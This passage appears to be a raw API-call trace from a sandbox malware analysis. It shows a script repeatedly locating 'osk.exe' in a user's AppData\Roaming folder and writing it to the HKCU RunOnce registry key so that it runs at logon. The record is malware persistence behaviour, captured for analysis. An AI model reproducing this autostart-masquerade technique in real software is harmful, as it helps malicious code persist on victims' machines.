[7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.249] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.249] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.250] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, 
riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.250] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.250] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0092.250] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.250] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x76 [0092.250] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), 
pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.251] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x75 [0092.251] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.251] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.251] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.251] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.251] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.251] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.252] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.252] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.252] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.252] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.252] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | 
out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.252] RegCloseKey (hKey=0x280) returned 0x0 [0092.252] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.252] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.252] SetTimer (hWnd=0x20280, nIDEvent=0x21f1, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f1 [0092.252] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.264] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.264] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.264] KillTimer (hWnd=0x20280, uIDEvent=0x21f1) returned 1 [0092.264] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.264] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.265] IUnknown:Release (This=0x787518) returned 0x1 [0092.265] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.265] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.265] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, 
wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.265] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.265] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.266] 
FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0092.266] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.266] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x77 [0092.266] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.267] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x76 [0092.267] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.267] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.267] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.267] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.267] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.267] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.267] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.267] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.268] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.268] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.268] RegCloseKey (hKey=0x280) returned 0x0 [0092.268] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.268] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.268] SetTimer (hWnd=0x20280, nIDEvent=0x21f2, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f2 [0092.268] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.279] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.279] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.280] KillTimer (hWnd=0x20280, uIDEvent=0x21f2) returned 1 [0092.280] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.280] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, 
Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.280] IUnknown:Release (This=0x787518) returned 0x1 [0092.280] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.280] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.280] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.281] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 
[0092.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.281] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.281] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0092.281] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.281] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x78 [0092.281] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, 
puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.282] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x77 [0092.282] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.282] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.282] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.282] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.282] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.283] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.283] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.283] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, 
lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.283] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.283] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.283] RegCloseKey (hKey=0x280) returned 0x0 [0092.283] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.284] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.284] SetTimer (hWnd=0x20280, nIDEvent=0x21f3, uElapse=0xa, lpTimerFunc=0x0) returned 0x21f3 [0092.284] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.295] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.295] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.295] KillTimer (hWnd=0x20280, uIDEvent=0x21f3) returned 1 [0092.295] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.296] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.296] IUnknown:Release (This=0x787518) returned 0x1 [0092.296] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.296] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.296] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 
lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.296] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.296] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), 